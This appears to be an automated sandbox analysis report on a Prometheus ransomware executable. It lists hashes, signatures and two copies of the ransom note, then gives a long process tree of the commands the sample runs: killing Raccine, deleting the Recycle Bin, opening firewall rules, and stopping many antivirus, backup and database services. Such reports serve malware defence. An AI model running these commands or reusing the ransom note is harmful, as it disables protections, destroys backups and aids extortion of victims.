Analysis
-
max time kernel
134s -
max time network
135s -
platform
windows7_x64 -
resource
win7v20210410 -
submitted
02-06-2021 15:02
General
-
Target
dd4eb8aa3371b7fd821a7a9730c924cf.exe
-
Size
194KB
-
MD5
dd4eb8aa3371b7fd821a7a9730c924cf
-
SHA1
3e53f7bf7dcb8569aaf0f3a3bcf67bda4c01c054
-
SHA256
9bf0633f41d2962ba5e2895ece2ef9fa7b546ada311ca30f330f0d261a7fb184
-
SHA512
12e760a59377632548f41bbdb98941a04c7d32b5d084f70b23db702dbeabb1e7a489df6d03af40da977a463150e4d144641fbc4640037e8858897a0509c9f356
Score
10/10
Malware Config
Extracted
Path
C:\Users\Admin\AppData\Local\Temp\RESTORE_FILES_INFO.txt
Family
prometheus
Ransom Note
!!! ALL YOUR FILES ARE ENCRYPTED !!!
All your files, documents, photos, databases and other important files are encrypted.
You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key.
Only we can give you this key and only we can recover your files.
We recommend you upload 3 encrypted files in https://privatlab.com/file and paste link to you message. We will demonstrate that we can recover your files.
* Please note that files must not contain any valuable information.
Do you really want to restore your files?
1) Using a TOR browser!
a) Download and install TOR browser from this site: https://torproject.org/
b) Open website: http://sonarmsniko2lvfu.onion/?a=reg
c) Register account
d) Click Compose and write to us, our username: Prometheus, in message write Your Key Identifier (it is at the end of file)
2) Using a email
Write to 3 emails address at once, in message write Your Key Identifier (it is at the end of file) :
[email protected]
[email protected]
[email protected]
We recommend using 1 method via TOR browser to contact us.
Email letters may not reach us. Therefore, if you do not receive a response within 12 hours, please use method 1.
* Do not rename encrypted files.
* Do not try to decrypt your data using third party software, it may cause permanent data loss.
* Decryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam.
*For our safety, all information about your server and your decryption key will be automaticaly DELETED AFTER 7 DAYS! You will irrevocably lose all your data!
Key Identifier:
eMYQaF9UnXGT1YvwIKo2S+Qlp2shG+aZ3nwfT2xixyjqfbPx4ip2tCHoSkW7XynZb/9lph4+n0UiVp3EFWlBh3fPWsK5F6bmfY/5E7G40/JDir4haDstLeslTB8mJE0z6KegjYWbs1doPEVjP7tNxywBlwNDa2SbqKyYldRLxxP1/9DxDO8UOvHh25lISJv7sE8nmx/dAB3t8jELmEtDHaLcR1OJBZKylQ6GUOEJSnggiKMm8gEVu3ee7+Hroppy+qrPr2VUbPx+7xDZoDvf/9WcfTEFFTX/j7UCrAwqRqV4W4Q0lk305DuUQjoRq8MJSsDVJBuXd/1IHsUvI3ZPcsKe0a7SythsQ/6zkCGB6VQPt9ZBxmoo3rB/yABRVu+I1p8OxpDVKMxfQLJECTDB2ZhYmQKXdJGU1lPlOO9OhsydtzfQjlXwWnE5F8sU95WcOkrGyGLzR/OfF6Xk/nN3AgiVFgIYUiT3NR4cTO4d93yrmb9VR7mnwNl7kgMqQpJn/DO2yc4/8YngzrBhYwEbrijNZwRs2eB/Dc6ihxv8trMS1wIivqsqqZkixPO2RR2NLGiVUAKslhDIK+hQglzpg02u7srC8ESbx8zABTLtRaC01WC1I8hTv2LVTwwGfAZ0AYNwV4l+4IJoA1LRcMjqnKHUXds+nZevY7TL0l2++DY=
URLs
https://privatlab.com/file
http://sonarmsniko2lvfu.onion/?a=reg
Extracted
Path
C:\Users\Admin\Desktop\RESTORE_FILES_INFO.hta
Family
prometheus
Ransom Note
!!! ALL YOUR FILES ARE ENCRYPTED !!!
All your files, documents, photos, databases and other important files are encrypted.
You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key.
Only we can give you this key and only we can recover your files.
We recommend you upload 3 encrypted files in https://privatlab.com/file and paste link to you message. We will demonstrate that we can recover your files.
* Please note that files must not contain any valuable information.
Do you really want to restore your files?
1) Using a TOR browser!
a) Download and install TOR browser from this site: https://torproject.org/
b) Open website: http://sonarmsniko2lvfu.onion/?a=reg
c) Register account
d) Click Compose and write to us, our username: Prometheus, in message write Your Key Identifier (it is at the end of file)
2) Using a email
Write to 3 emails address at once, in message write Your Key Identifier (it is at the end of file) :
[email protected]
[email protected]
[email protected]
We recommend using 1 method via TOR browser to contact us.
Email letters may not reach us. Therefore, if you do not receive a response within 12 hours, please use method 1.
* Do not rename encrypted files.
* Do not try to decrypt your data using third party software, it may cause permanent data loss.
* Decryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam.
*For our safety, all information about your server and your decryption key will be automaticaly DELETED AFTER 7 DAYS! You will irrevocably lose all your data!
Key Identifier: eMYQaF9UnXGT1YvwIKo2S+Qlp2shG+aZ3nwfT2xixyjqfbPx4ip2tCHoSkW7XynZb/9lph4+n0UiVp3EFWlBh3fPWsK5F6bmfY/5E7G40/JDir4haDstLeslTB8mJE0z6KegjYWbs1doPEVjP7tNxywBlwNDa2SbqKyYldRLxxP1/9DxDO8UOvHh25lISJv7sE8nmx/dAB3t8jELmEtDHaLcR1OJBZKylQ6GUOEJSnggiKMm8gEVu3ee7+Hroppy+qrPr2VUbPx+7xDZoDvf/9WcfTEFFTX/j7UCrAwqRqV4W4Q0lk305DuUQjoRq8MJSsDVJBuXd/1IHsUvI3ZPcsKe0a7SythsQ/6zkCGB6VQPt9ZBxmoo3rB/yABRVu+I1p8OxpDVKMxfQLJECTDB2ZhYmQKXdJGU1lPlOO9OhsydtzfQjlXwWnE5F8sU95WcOkrGyGLzR/OfF6Xk/nN3AgiVFgIYUiT3NR4cTO4d93yrmb9VR7mnwNl7kgMqQpJn/DO2yc4/8YngzrBhYwEbrijNZwRs2eB/Dc6ihxv8trMS1wIivqsqqZkixPO2RR2NLGiVUAKslhDIK+hQglzpg02u7srC8ESbx8zABTLtRaC01WC1I8hTv2LVTwwGfAZ0AYNwV4l+4IJoA1LRcMjqnKHUXds+nZevY7TL0l2++DY=
URLs
https://privatlab.com/file
http://sonarmsniko2lvfu.onion/?a=reg
Signatures
-
Prometheus Ransomware
Ransomware family mostly targeting manufacturing industry and claims to be affiliated with REvil.
-
Blocklisted process makes network request 18 IoCs
-
Downloads MZ/PE file
-
Downloads PsExec from SysInternals website 1 IoCs
Sysinternals tools like PsExec are often leveraged maliciously by malware families due to being commonly used by testers/administrators.
-
Modifies Windows Firewall 1 TTPs
-
Modifies extensions of user files 1 IoCs
Ransomware generally changes the extension on encrypted files.
-
Deletes itself 1 IoCs
-
Drops startup file 1 IoCs
-
Modifies file permissions 1 TTPs 3 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Modifies WinLogon 2 TTPs 2 IoCs
-
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Discovers systems in the same network 1 TTPs 1 IoCs
-
Kills process with taskkill 48 IoCs
-
Modifies Internet Explorer settings 1 TTPs 1 IoCs
-
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious use of AdjustPrivilegeToken 50 IoCs
-
Suspicious use of FindShellTrayWindow 3 IoCs
-
Suspicious use of SendNotifyMessage 3 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
System policy modification 1 TTPs 4 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\dd4eb8aa3371b7fd821a7a9730c924cf.exe"C:\Users\Admin\AppData\Local\Temp\dd4eb8aa3371b7fd821a7a9730c924cf.exe"1⤵
- Modifies extensions of user files
- Drops startup file
- Modifies WinLogon
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
- System policy modification
-
C:\Windows\SysWOW64\taskkill.exe"taskkill" /F /IM RaccineSettings.exe2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\reg.exe"reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F2⤵
-
-
C:\Windows\SysWOW64\reg.exe"reg" delete HKCU\Software\Raccine /F2⤵
- Modifies registry key
-
-
C:\Windows\SysWOW64\schtasks.exe"schtasks" /DELETE /TN "Raccine Rules Updater" /F2⤵
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin2⤵
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c rd /s /q D:\\$Recycle.bin2⤵
-
-
C:\Windows\SysWOW64\netsh.exe"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes2⤵
-
-
C:\Windows\SysWOW64\netsh.exe"netsh" advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes2⤵
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config Dnscache start= auto2⤵
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config FDResPub start= auto2⤵
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SQLTELEMETRY start= disabled2⤵
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SSDPSRV start= auto2⤵
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SstpSvc start= disabled2⤵
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled2⤵
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config upnphost start= auto2⤵
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SQLWriter start= disabled2⤵
-
-
C:\Windows\SysWOW64\net.exe"net.exe" start Dnscache /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start Dnscache /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop bedbg /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop bedbg /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" start FDResPub /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start FDResPub /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" start SSDPSRV /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start SSDPSRV /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$SQL_2008 /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$SQL_2008 /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop avpsus /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop avpsus /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" start upnphost /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start upnphost /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ccEvtMgr /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ccEvtMgr /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop McAfeeDLPAgentService /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop McAfeeDLPAgentService /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop EhttpSrv /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop EhttpSrv /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ccSetMgr /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ccSetMgr /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MMS /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MMS /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop mfewc /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop mfewc /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$SYSTEM_BGC /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$SYSTEM_BGC /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop EPSecurityService /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop EPSecurityService /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$SQLEXPRESS /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$SQLEXPRESS /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SavRoam /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SavRoam /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop RTVscan /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop RTVscan /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop DefWatch /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop DefWatch /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop NetBackup BMR MTFTP Service /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ekrn /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ekrn /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BMR Boot Service /y2⤵
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop QBFCService /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop QBFCService /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$VEEAMSQL2008R2 /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop mozyprobackup /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop mozyprobackup /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VSNAPVSS /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VSNAPVSS /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$TPS /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$TPS /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop QBIDPService /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop QBIDPService /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$VEEAMSQL2012 /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$VEEAMSQL2012 /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SDRSVC /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SDRSVC /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop Intuit.QuickBooks.FCS /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamTransportSvc /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamTransportSvc /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$TPSAMA /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$TPSAMA /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ntrtscan /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ntrtscan /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop EPUpdateService /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop EPUpdateService /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$VEEAMSQL2008R2 /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop KAVFS /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop KAVFS /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQLFDLauncher$PROFXENGAGEMENT /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$PROFXENGAGEMENT /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop FA_Scheduler /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop FA_Scheduler /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop QBCFMonitorService /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop QBCFMonitorService /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop YooBackup /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop YooBackup /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQLFDLauncher$SYSTEM_BGC /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$SYSTEM_BGC /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamCatalogSvc /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamCatalogSvc /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop klnagent /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop klnagent /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQLFDLauncher$SQL_2008 /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$SQL_2008 /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamBrokerSvc /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamBrokerSvc /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ESHASRV /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ESHASRV /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$VEEAMSQL2008R2 /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop PDVFSService /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop PDVFSService /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop EsgShKernel /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop EsgShKernel /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop YooIT /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop YooIT /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamDeploymentService /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamDeploymentService /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop zhudongfangyu /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop zhudongfangyu /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQLFDLauncher$SBSMONITORING /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$SBSMONITORING /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamCloudSvc /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamCloudSvc /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQLFDLauncher$TPS /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$TPS /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamNFSSvc /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamNFSSvc /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop macmnsvc /y2⤵
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLWriter /y2⤵
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop KAVFSGT /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop KAVFSGT /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop veeam /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop veeam /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop stc_raw_agent /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop stc_raw_agent /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop masvc /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop masvc /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop PDVFSService /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop PDVFSService /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamBackupSvc /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamBackupSvc /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecJobEngine /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecJobEngine /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Sophos AutoUpdate Service” /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Sophos AutoUpdate Service” /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSExchangeIS /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeIS /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop NetMsmqActivator /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop NetMsmqActivator /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MsDtsServer100 /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MsDtsServer100 /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “SQL Backups /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “SQL Backups /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Enterprise Client Service” /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Enterprise Client Service” /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecAgentAccelerator /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecAgentAccelerator /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecVSSProvider /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecVSSProvider /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQLFDLauncher$SHAREPOINT /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$SHAREPOINT /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecDiveciMediaService /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecDiveciMediaService /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecAgentBrowser /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecAgentBrowser /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamDeploymentService /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamDeploymentService /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecManagementService /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecManagementService /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQLFDLauncher$TPSAMA /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$TPSAMA /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SamSs /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SamSs /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop kavfsslp /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop kavfsslp /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ReportServer /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ReportServer /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MBAMService /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MBAMService /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecRPCService /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecRPCService /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQLServerADHelper /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLServerADHelper /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “SQLsafe Backup Service” /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “SQLsafe Backup Service” /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MsDtsServer110 /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MsDtsServer110 /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop POP3Svc /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop POP3Svc /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSExchangeMGMT /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeMGMT /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Sophos Clean Service” /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Sophos Clean Service” /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop McAfeeEngineService /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop McAfeeEngineService /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MBEndpointAgent /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MBEndpointAgent /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQLSERVER /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLSERVER /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “SQLsafe Filter Service” /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “SQLsafe Filter Service” /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop msftesql$PROD /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop msftesql$PROD /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ReportServer$SQL_2008 /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ReportServer$SQL_2008 /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SstpSvc /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SstpSvc /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSExchangeMTA /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeMTA /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ReportServer$SYSTEM_BGC /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ReportServer$SYSTEM_BGC /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Sophos Device Control Service” /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Sophos Device Control Service” /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Symantec System Recovery” /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Symantec System Recovery” /y3⤵
-
-
-
